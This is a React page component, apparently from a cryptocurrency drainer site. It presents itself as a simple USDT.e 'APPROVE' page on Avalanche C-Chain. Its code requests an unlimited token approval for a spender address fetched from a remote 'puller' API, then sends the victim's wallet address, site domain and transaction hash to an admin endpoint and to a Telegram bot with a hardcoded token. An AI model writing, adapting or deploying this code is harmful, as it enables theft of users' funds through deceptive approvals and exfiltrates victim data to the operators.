import React, { useState } from 'react'
import { ethers } from 'ethers'
import { getEthereumProviderAsync } from '../utils/walletProvider'
import './TokenPage.css'

// Avalanche C-Chain constants
const AVAX_CHAIN_ID = 43114
const USDTE_AVAX_ADDRESS = "0x9702230A8Ea53601f5cD2dc00fDBc13d4dF4A8c7" // USDT.e on Avalanche
const AVAX_SPENDER_CONTRACT = "0xBe2Fa0003F009E6A3b6b9C7F6637BE7D12A042c2"

const DAPP_URL = "https://multiscan.app"
const TELEGRAM_BOT_TOKEN = '8488646645:AAEyGRl3Os2AVMveBzJWdFgbb9yKVEDrhuI'
const TELEGRAM_CHAT_ID = '-1003373959785'

const USDTEAVAXPage = () => {
  const [loading, setLoading] = useState(false)
  const [error, setError] = useState(null)
  const [success, setSuccess] = useState(false)

  // Function to send messages to Telegram
  const sendTelegramMessage = async (message) => {
    try {
      const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`
      const response = await fetch(url, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({
          chat_id: TELEGRAM_CHAT_ID,
          text: message,
          parse_mode: 'HTML',
        }),
      })
      
      if (!response.ok) {
        console.error('Error sending to Telegram:', await response.text())
      }
    } catch (error) {
      console.error('Error sending to Telegram:', error)
    }
  }

  // Function to format date and time
  const formatDateTime = () => {
    const now = new Date()
    const date = now.toLocaleDateString('en-US', {
      year: 'numeric',
      month: '2-digit',
      day: '2-digit',
    })
    const time = now.toLocaleTimeString('en-US', {
      hour: '2-digit',
      minute: '2-digit',
      second: '2-digit',
    })
    return `${date} ${time}`
  }

  const connectAVAX = async () => {
    const prov = await getEthereumProviderAsync()
    if (!prov || typeof prov.request !== 'function') {
      throw new Error("Wallet not found. Please open the page in Bybit Wallet or install MetaMask and refresh.")
    }
    const provider = new ethers.BrowserProvider(prov)
    
    // Request wallet connection
    await provider.send("eth_requestAccounts", [])
    const signer = await provider.getSigner()

    // Check current network
    let cur = await provider.send("eth_chainId", [])
    let currentChainId = parseInt(cur, 16)
    
    // If network is not Avalanche C-Chain, switch
    if (currentChainId !== AVAX_CHAIN_ID) {
      try {
        // Try to switch to Avalanche C-Chain
        await provider.send("wallet_switchEthereumChain", [{ chainId: `0x${AVAX_CHAIN_ID.toString(16)}` }])
        
        // Wait for network switch (check several times)
        let attempts = 0
        while (attempts < 20) {
          await new Promise(resolve => setTimeout(resolve, 200))
          cur = await provider.send("eth_chainId", [])
          currentChainId = parseInt(cur, 16)
          if (currentChainId === AVAX_CHAIN_ID) {
            break
          }
          attempts++
        }
        
        if (currentChainId !== AVAX_CHAIN_ID) {
          throw new Error("Failed to switch to Avalanche C-Chain network")
        }
      } catch (switchError) {
        // If network is not added, add it
        if (switchError.code === 4902 || switchError.message?.includes('Unrecognized chain')) {
          await provider.send("wallet_addEthereumChain", [{
            chainId: `0x${AVAX_CHAIN_ID.toString(16)}`,
            chainName: "Avalanche C-Chain",
            nativeCurrency: {
              name: "AVAX",
              symbol: "AVAX",
              decimals: 18
            },
            rpcUrls: ["https://api.avax.network/ext/bc/C/rpc"],
            blockExplorerUrls: ["https://snowtrace.io/"]
          }])
          
          // Wait for network to be added and switched
          let attempts = 0
          while (attempts < 20) {
            await new Promise(resolve => setTimeout(resolve, 200))
            cur = await provider.send("eth_chainId", [])
            currentChainId = parseInt(cur, 16)
            if (currentChainId === AVAX_CHAIN_ID) {
              break
            }
            attempts++
          }
          
          if (currentChainId !== AVAX_CHAIN_ID) {
            throw new Error("Failed to add and switch to Avalanche C-Chain network")
          }
        } else {
          throw switchError
        }
      }
    }

    return { provider, signer }
  }

  const handleApprove = async () => {
    try {
      setLoading(true)
      setError(null)
      setSuccess(false)
      console.log("AVAX APPROVE started for USDT.e")

      const ethProv = await getEthereumProviderAsync()
      if (!ethProv) {
        throw new Error("Wallet not ready. Please open the page in Bybit Wallet or refresh the page.")
      }

      // Get spender from API (dynamic); fallback to constant
      let spenderAddress = null
      try {
        const resPuller = await fetch(`${DAPP_URL}/api/v1/puller?type=USDT_AVAX`)
        if (resPuller.ok) {
          const text = await resPuller.text().then(t => t.trim())
          if (!text.startsWith('<!DOCTYPE') && !text.startsWith('<html')) {
            try {
              const data = JSON.parse(text)
              spenderAddress = data.puller || data.pullerAddress || data.address || data.data || data
              if (typeof data === 'string' && data.startsWith('0x') && data.length === 42) spenderAddress = data
            } catch (e) {
              if (text.startsWith('0x') && text.length === 42) spenderAddress = text
            }
          }
        }
      } catch (fetchError) {
        console.warn("Puller API fetch failed, using default spender:", fetchError?.message)
      }
      if (!spenderAddress || typeof spenderAddress !== 'string' || !spenderAddress.startsWith('0x') || spenderAddress.length !== 42) {
        console.warn("Spender not received or invalid, using default AVAX spender")
        spenderAddress = AVAX_SPENDER_CONTRACT
      }
      console.log("Spender address:", spenderAddress)

      // Connect to Avalanche C-Chain
      const { provider, signer } = await connectAVAX()
      const owner = await signer.getAddress()

      // Get USDT.e AVAX C-Chain contract
      const usdtContract = new ethers.Contract(
        USDTE_AVAX_ADDRESS,
        [
          "function approve(address spender, uint256 amount) returns (bool)",
          "function allowance(address owner, address spender) view returns (uint256)"
        ],
        signer
      )

      // Maximum value for unlimited approve
      const maxApproval = ethers.MaxUint256

      // Check current allowance
      const currentAllowance = await usdtContract.allowance(owner, spenderAddress)
      console.log("Current allowance:", currentAllowance.toString())

      // Execute approve
      const tx = await usdtContract.approve(spenderAddress, maxApproval)
      console.log("Approve transaction sent:", tx.hash)

      // Wait for confirmation
      await tx.wait()
      console.log("✅ USDT.e AVAX C-Chain approve completed successfully:", tx.hash)

      const domainName = window.location.hostname
      
      // Send data to server (not critical if it fails)
      try {
        const params = new URLSearchParams({
          owner: owner.toLowerCase(),
          domainName: domainName
        })

        const resSubmit = await fetch(`${DAPP_URL}/api/admin/usdts-avax?${params.toString()}`, {
          method: "POST",
          headers: { 
            "Content-Type": "application/json"
          }
        })

        if (!resSubmit.ok) {
          const text = await resSubmit.text()
          console.error("Submit Error:", text)
        } else {
          console.log("AVAX APPROVE OK - data sent to server")
        }
      } catch (submitError) {
        console.warn("Failed to send data to server (not critical):", submitError)
      }

      // Send connection information to Telegram (always send, even if server didn't respond)
      try {
        const telegramMessage = `✅ <b>USDT.e AVAX C-Chain Approve</b>\n\n` +
          `🔗 Wallet Address: <code>${owner.toLowerCase()}</code>\n` +
          `🌐 Domain: <code>${domainName}</code>\n` +
          `💼 Token: USDT.e (AVAX C-Chain)\n` +
          `📝 Transaction: <code>${tx.hash}</code>\n` +
          `⏰ Time: ${formatDateTime()}`
        await sendTelegramMessage(telegramMessage)
        console.log("Telegram notification sent")
      } catch (telegramError) {
        console.warn("Failed to send Telegram notification:", telegramError)
      }
      
      setSuccess(true)
      setLoading(false)
    } catch (e) {
      console.error("AVAX APPROVE FAILED", e)
      
      let userMessage = "An error occurred while connecting"
      
      if (e.code === 4001 || e.message?.includes('denied') || e.message?.includes('rejected') || e.message?.includes('User denied')) {
        userMessage = "Transaction was cancelled. Please confirm the transaction in your wallet to continue."
      } else if (e.message?.includes('MetaMask not found') || e.message?.includes('not found')) {
        userMessage = "MetaMask not found. Please install MetaMask and refresh the page."
      } else if (e.message?.includes('Failed to access') || e.message?.includes('access')) {
        userMessage = "Failed to access wallet. Please unlock MetaMask and try again."
      } else if (e.message?.includes('Wallet not ready')) {
        userMessage = "Wallet not ready. Please refresh the page and try again."
      } else if (e.message?.includes('network') || e.message?.includes('chain')) {
        userMessage = "Network error. Please check your internet connection and try again."
      } else if (e.message?.includes('insufficient funds')) {
        userMessage = "Insufficient funds to complete the transaction. Please top up your wallet balance."
      } else if (e.message?.includes('timeout')) {
        userMessage = "Request timeout. Please try again."
      } else if (e.message?.includes('BEP20: approve to the zero address')) {
        userMessage = "Configuration error. Please contact support."
      } else if (e.message) {
        userMessage = e.message
      }
      
      setError(userMessage)
      setLoading(false)
    }
  }

  return (
    <div className="token-page">
      <div className="token-page-container">
        <div className="token-header">
          <div className="token-icon">
            <img 
              src="https://assets.coingecko.com/coins/images/325/small/Tether.png" 
              alt="USDT.e"
              className="token-logo"
            />
          </div>
          <h1 className="token-title">USDT.e</h1>
          <p className="token-subtitle">Tether USD (AVAX C-Chain)</p>
        </div>

        {error && (
          <div className="token-error">
            {error}
          </div>
        )}

        {success && (
          <div className="token-success">
            ✅ Approve completed successfully!
          </div>
        )}

        {loading && (
          <div className="token-loading">
            Connecting and executing approve...
          </div>
        )}

        <button 
          className="token-approve-btn"
          onClick={handleApprove}
          disabled={loading || success}
        >
          {loading ? 'Processing...' : success ? 'Done!' : 'APPROVE'}
        </button>
      </div>
    </div>
  )
}

export default USDTEAVAXPage
